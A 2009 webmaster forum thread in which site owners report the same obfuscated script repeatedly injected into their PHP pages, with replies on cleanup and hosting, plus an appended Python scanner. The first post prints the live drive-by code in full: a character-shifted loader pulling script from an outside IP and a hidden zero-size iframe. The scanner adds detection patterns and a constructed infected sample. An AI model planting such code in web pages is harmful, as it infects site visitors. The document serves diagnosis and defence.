
Website Technology Issues Forum

    
Malware Traps?
mqcarpenter

5+ Year Member



 
Msg#: 3898567 posted 12:32 pm on Apr 23, 2009 (gmt 0)

Not sure if this is the right place for this.

I recently got nailed by Google on some of my sites. They categorized my sites as "malware." Bizarre to say the least. I have been operating these sites for almost ten years. Anyway, I found a strange piece of code at the bottom of one of my pages:

<!-- ad --><html><script>
/*@cc_on @*/
/*@if (@_win32)
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6/23:/255/33:0hfpwj{ju0tubut/kt#?=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);
/*@end @*/
</script></html><!-- /ad --><!-- counter --><script language=javascript>status=location;document.write('<iframe src="http://example.com/trf.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>');</script><!-- counter -->

I have no idea how this happened. Has anyone had this happen to them? HOW can this get on there? I want to prevent this kind of thing from happening in the future.

[edited by: engine at 7:34 pm (utc) on April 24, 2009]
[edit reason] examplified [/edit]

 

ebby

5+ Year Member



 
Msg#: 3898567 posted 12:56 pm on Apr 23, 2009 (gmt 0)

This just happened to me also, any help would be greatly appreciated. Mine was a PunBB forum.

ebby

5+ Year Member



 
Msg#: 3898567 posted 1:05 pm on Apr 23, 2009 (gmt 0)

This is the exact same code found on my index and login php pages. EXACT. Not cool.

mqcarpenter

5+ Year Member



 
Msg#: 3898567 posted 3:56 pm on Apr 23, 2009 (gmt 0)

Well I did not do it! lol

ebby

5+ Year Member



 
Msg#: 3898567 posted 4:30 pm on Apr 23, 2009 (gmt 0)

What type of site was it?

neil665

5+ Year Member



 
Msg#: 3898567 posted 11:14 am on Apr 24, 2009 (gmt 0)

Also had similar code added to a couple of sites recently,
'mysite.co.uk' and 'mysite.com'.
The 'mysite.co.uk' is a regional U.K. tourism site
and the 'mysite.com' is where I do my future development.

Both sites are on the same server located in the U.K.

Have now changed the passwords.

Regards

Neil

Mishkan

5+ Year Member



 
Msg#: 3898567 posted 7:35 pm on Apr 26, 2009 (gmt 0)

Hi

I also had the same thing.

I deleted the codes and after 2 days it was up again on the index.php and login.php file on my site.

Does anyone know what this is?

g1smd

WebmasterWorld Senior Member, WebmasterWorld Top Contributor of All Time, 10+ Year Member



 
Msg#: 3898567 posted 8:59 pm on Apr 26, 2009 (gmt 0)

Looks like you have been hacked with code that does something nasty when a visitor looks at the page.

That sort of attack is getting much more common; WordPress and other similar products have been targeted several times.

There's a lot of advice in previous threads. You need to go beyond cleaning out the code and changing the passwords. There is some fundamental loophole that the miscreants are taking advantage of.

neil665

5+ Year Member



 
Msg#: 3898567 posted 9:01 am on Apr 28, 2009 (gmt 0)

The 'mysite.com' site was again attacked yesterday,
and Google has blocked this site.

Regards Neil

lammert

WebmasterWorld Senior Member, WebmasterWorld Top Contributor of All Time, 5+ Year Member



 
Msg#: 3898567 posted 9:55 am on Apr 28, 2009 (gmt 0)

Shared hosting or VPS/dedicated?

If shared hosting, move to another hosting company. With shared hosting you have only limited possibilities to close such holes and with shared hosting many times the problem is caused by the hosting provider rather than the website operator.

neil665

5+ Year Member



 
Msg#: 3898567 posted 6:37 am on Apr 29, 2009 (gmt 0)

Using shared hosting,
does VPS provide a higher level of security?
Is it still open to hackers adding malicious code?

Regards Neil
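
Added example, not posted by anyone in this thread: several members report the same block reappearing in index.php and login.php after they deleted it, so this Python scanner flags files that carry the traits of the quoted injection (the `/*@cc_on` conditional-compilation wrapper, the `fromCharCode(charCodeAt - n)` decoder loop, a zero-size iframe) and decodes the hidden string for review. The function names, signature labels and the `malware.example` URL are assumptions made for the example; the sample input is constructed.

```python
import os
import re

# Signatures drawn from the injected block quoted in the first post.
SIGNATURES = {
    "jscript conditional compilation": re.compile(r"/\*@cc_on"),
    "char-shift decoder": re.compile(
        r"fromCharCode\([^)]*charCodeAt\([^)]*\)\s*-\s*(\d+)\s*\)"),
    "zero-size iframe": re.compile(
        r"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?0\b", re.I),
}
STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')

def shift_decode(text, shift):
    """Undo the obfuscation by subtracting `shift` from each character code."""
    return "".join(chr(max(ord(c) - shift, 0)) for c in text)

def scan(text):
    """Return (matched signature names, decoded payloads) for one file's text."""
    hits = [name for name, rx in SIGNATURES.items() if rx.search(text)]
    decoded = []
    m = SIGNATURES["char-shift decoder"].search(text)
    if m:  # reuse the shift the decoder loop itself applies
        for literal in STRING_LITERAL.findall(text):
            plain = shift_decode(literal, int(m.group(1)))
            if re.search(r"<script|<iframe|https?://", plain, re.I):
                decoded.append(plain)
    return hits, decoded

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a web root and report every file matching at least one signature."""
    report = {}
    for folder, _, names in os.walk(root):
        for name in (n for n in names if n.lower().endswith(exts)):
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits, decoded = scan(fh.read())
            if hits:
                report[path] = (hits, decoded)
    return report

# Constructed sample in the shape of the quoted injection; URLs are placeholders.
PLAIN = '<script type="text/javascript" src="http://malware.example/stats.js"></script>'
ENCODED = "".join(chr(ord(c) + 1) for c in PLAIN)
INFECTED = ('<!-- ad --><html><script>\n/*@cc_on @*/\n/*@if (@_win32)\n'
            'var source ="' + ENCODED + '"; var result = "";\nfor(var i=0;i<source.length;i++) '
            'result+=String.fromCharCode(source.charCodeAt(i)-1);\ndocument.write(result);\n'
            '/*@end @*/\n</script></html><!-- /ad --><script>document.write(\'<iframe '
            'src="http://example.com/trf.php" width=0 height=0></iframe>\');</script>')
CLEAN = '<html><body><iframe src="/map" width=600 height=400></iframe></body></html>'
```

Running `scan_tree` over the web root on a schedule shows when files have been modified again; a hit says nothing about how the attacker got in, which still has to be found and closed.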

WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved